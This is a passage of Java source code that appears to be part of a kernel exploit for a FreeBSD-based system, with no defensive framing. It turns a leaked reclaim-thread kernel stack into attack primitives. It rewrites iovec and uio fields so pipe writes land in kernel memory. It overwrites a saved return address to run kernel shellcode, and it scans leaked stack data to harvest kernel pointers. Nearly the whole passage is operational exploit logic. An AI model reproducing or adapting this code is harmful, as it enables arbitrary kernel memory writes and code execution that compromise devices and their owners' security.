// uiomove_faultflag(void* cp = cp, int n = n, struct uio* uio = uio, int nofault = 0)
// UIO_USERSPACE: copyout(const void* kaddr = cp, void* uaddr = iov->iov_base, size_t len = cnt)
// UIO_SYSSPACE: bcopy(const void* src = cp, void* dst = iov->iov_base, size_t len = cnt)
// Clear pipe buffer.
//api.clearMemory(pipeBufferAddress, pipeBufferCapacity);
// Set up parameters for command processor.
targetReclaimJob.setCommandWaitFlag(true);
targetReclaimJob.setCommandArg(0, userAddress); // src
targetReclaimJob.setCommandArg(1, kernelAddress); // dst
targetReclaimJob.setCommandArg(2, size); // size
// Issue write command.
Log.debug("Issuing write command");
targetReclaimJob.setCommand(CMD_WRITE);
// Wait for blocking read call on other thread.
ThreadUtil.sleepMs(TINY_WAIT_PERIOD);
// We have this partial stack layout:
// struct {
// struct iovec aiov;
// struct uio auio;
// };
//
// To locate it inside buffer let's make search pattern based on known `aiov`.
ioVec.setBase(pipeBufferAddress);
ioVec.setLength(size);
ioVec.serialize(ioVecAddress);
//Log.debug("Scanning kernel stack at " + TypeUtil.int64ToHex(stackDataBuffer.getAddress()) + " of size " + TypeUtil.int32ToHex(stackDataBuffer.getSize()) + " bytes");
while (targetReclaimJob.getCommandWaitFlag()) {
if (dumpKernelStackOfReclaimThread) {
Log.info("Kernel stack data:");
stackDataBuffer.dump();
}
if (dumpKernelStackPointers) {
Log.info("Classifying leaked kernel addresses");
final KernelAddressClassifier classifier = KernelAddressClassifier.fromBuffer(stackDataBuffer);
classifier.dump();
}
//Log.debug("Searching kernel stack for IO vector data");
//api.dumpMemory(ioVecAddress, Offsets.sizeOf_iovec);
final int offset = stackDataBuffer.find(ioVecAddress, Offsets.sizeOf_iovec);
//Log.debug("Found offset: " + TypeUtil.int32ToHex(offset));
if (offset != -1) {
final long ioVecMappedAddress = stackDataBuffer.getAddress() + offset;
final long uioMappedAddress = ioVecMappedAddress + Offsets.sizeOf_iovec;
//Log.debug("Found IO vector data in kernel stack at " + TypeUtil.int64ToHex(ioVecMappedAddress));
ioVec.deserialize(ioVecMappedAddress);
//Log.debug("iovec: " + TypeUtil.inspectObject(ioVec));
uio.deserialize(uioMappedAddress);
//Log.debug("uio: " + TypeUtil.inspectObject(uio));
if (ioVec.getBase() == pipeBufferAddress && ioVec.getLength() == size && uio.getSegmentFlag() == Constants.UIO_USERSPACE && uio.getReadWrite() == Constants.UIO_READ) {
//Log.debug("GOT MATCH!!!");
api.write64(ioVecMappedAddress + Offsets.offsetOf_iovec_base, kernelAddress);
api.write32(uioMappedAddress + Offsets.offsetOf_uio_segflg, Constants.UIO_SYSSPACE);
break;
}
}
Thread.yield();
}
// Write data into corresponding pipe.
//Log.debug("Writing data to write pipe #" + writePipeDescriptor + " at " + TypeUtil.int64ToHex(userAddress) + " of size " + TypeUtil.int64ToHex(size));
final long result = LibKernel.write(writePipeDescriptor, userAddress, size);
if (result == -1L) {
api.warnMethodFailedPosix("write");
return null;
}
// Wait until reclaim thread report about result.
//Log.debug("Waiting for command processor");
while (targetReclaimJob.getCommandWaitFlag()) {
Thread.yield();
}
// Get result from reclaim thread.
final long result2 = targetReclaimJob.getCommandResult();
final int errNo = targetReclaimJob.getCommandErrNo();
//Log.debug("Read result from reclaim thread is " + TypeUtil.int64ToHex(result2) + " and error is " + errNo);
if (result2 == -1L) {
api.warnMethodFailedPosix("read", errNo);
return null;
} else if (result != result2) {
Log.warn("Results of read/write operations are not consistent: " + TypeUtil.int64ToHex(result2) + " vs " + TypeUtil.int64ToHex(result));
}
//Log.debug("Number of bytes written: " + TypeUtil.int64ToHex(result2));
return new Long(result2);
}
//-------------------------------------------------------------------------
public void execute(Runnable runnableForReclaimThread, Runnable runnableForMainThread) {
Checks.ensureNotNull(targetReclaimJob);
synchronized (targetReclaimJob) {
// Set up parameters for command processor.
targetReclaimJob.setCommandWaitFlag(true);
targetReclaimJob.setCommandRunnable(runnableForReclaimThread);
// Issue execute command.
//Log.debug("Issuing execute command");
targetReclaimJob.setCommand(CMD_EXEC);
// Wait for other thread.
ThreadUtil.sleepMs(TINY_WAIT_PERIOD);
while (targetReclaimJob.getCommandWaitFlag()) {
if (runnableForMainThread != null) {
runnableForMainThread.run();
}
Thread.yield();
}
}
}
private static interface ReclaimThreadExecutor {
public abstract void runOnReclaimThread(MemoryBuffer stackDataBuffer);
public abstract void runOnMainThread(MemoryBuffer stackDataBuffer);
}
private boolean executeOnReclaimThread(ReclaimThreadExecutor executor) {
Checks.ensureNotNull(executor);
execute(new Runnable() {
public void run() {
executor.runOnReclaimThread(stackDataBuffer);
}
}, new Runnable() {
public void run() {
executor.runOnMainThread(stackDataBuffer);
}
});
return true;
}
public boolean executeShellcode(long entrypointAddress) {
Checks.ensureNotZero(Offsets.addressOf_kernel__kern_select_post_cv_timedwait_sig_sbt);
class Executor implements ReclaimThreadExecutor {
private static final int WAIT_TIME_SECS = 1;
private static final int BUFFER_SIZE = 0x80;
private final MemoryBuffer buffer;
private final long bufferAddress;
private final long timeoutAddress;
private final long returnAddressAddress;
private final long entrypointAddress;
private boolean succeeded = false;
private boolean completed = false;
public Executor(long entrypointAddress) {
buffer = new MemoryBuffer(BUFFER_SIZE);
bufferAddress = buffer.getAddress();
timeoutAddress = bufferAddress;
returnAddressAddress = timeoutAddress + Offsets.sizeOf_timeval;
final TimeVal timeout = new TimeVal(WAIT_TIME_SECS);
timeout.serialize(timeoutAddress);
api.write64(returnAddressAddress, Offsets.addressOf_kernel__kern_select_post_cv_timedwait_sig_sbt);
this.entrypointAddress = entrypointAddress;
}
public void cleanup() {
buffer.cleanup();
}
public void runOnReclaimThread(MemoryBuffer stackDataBuffer) {
//Log.debug("Do blocking call on reclaim thread");
final int result = LibKernel.select(1, 0, 0, 0, timeoutAddress);
if (result == -1) {
final int errNo = api.getLastErrNo();
if (errNo == Constants.EINVAL) {
Log.debug("Syscall returned with expected error");
succeeded = true;
} else {
Log.warn("Syscall returned with unexpected error " + errNo);
}
} else {
Log.warn("Syscall unexpectedly succeeded");
}
}
public void runOnMainThread(MemoryBuffer stackDataBuffer) {
if (completed) {
return;
}
final int offset = stackDataBuffer.find(returnAddressAddress, 0x8);
if (offset != -1) {
//Log.debug("Found return address at " + TypeUtil.int32ToHex(offset));
stackDataBuffer.write64(offset, entrypointAddress);
//Log.debug("Return address changed from " + TypeUtil.int64ToHex(Offsets.addressOf_kernel__kern_select_post_cv_timedwait_sig_sbt) + " to " + TypeUtil.int64ToHex(entrypointAddress));
completed = true;
}
}
public boolean isSucceeded() {
return succeeded;
}
public boolean isCompleted() {
return completed;
}
}
Log.debug("Executing kernel shellcode");
final Executor executor = new Executor(entrypointAddress);
Checks.ensureTrue(executeOnReclaimThread(executor));
executor.cleanup();
if (!executor.isCompleted() || !executor.isSucceeded()) {
Log.warn("Executing kernel shellcode failed");
return false;
}
return true;
}
// TODO: Make generic version of it.
public KernelAddressClassifier leakKernelPointers(Runnable runnable, boolean justOnce) {
Checks.ensureNotNull(targetReclaimJob);
final KernelAddressClassifier classifier = new KernelAddressClassifier();
//Log.debug("Scanning kernel stack at " + TypeUtil.int64ToHex(stackDataBuffer.getAddress()) + " of size " + TypeUtil.int32ToHex(stackDataBuffer.getSize()) + " bytes");
final boolean[] finished = justOnce ? (new boolean[] { false }) : null;
execute(runnable, new Runnable() {
public void run() {
if (justOnce && finished[0]) {
return;
}
if (dumpKernelStackOfReclaimThread) {
Log.info("Leaked partial kernel stack data:");
stackDataBuffer.dump();
}
classifier.scan(stackDataBuffer);
if (justOnce) {
finished[0] = true;
}
}
});
if (dumpKernelStackPointers) {
classifier.dump();
}
return classifier;
}
}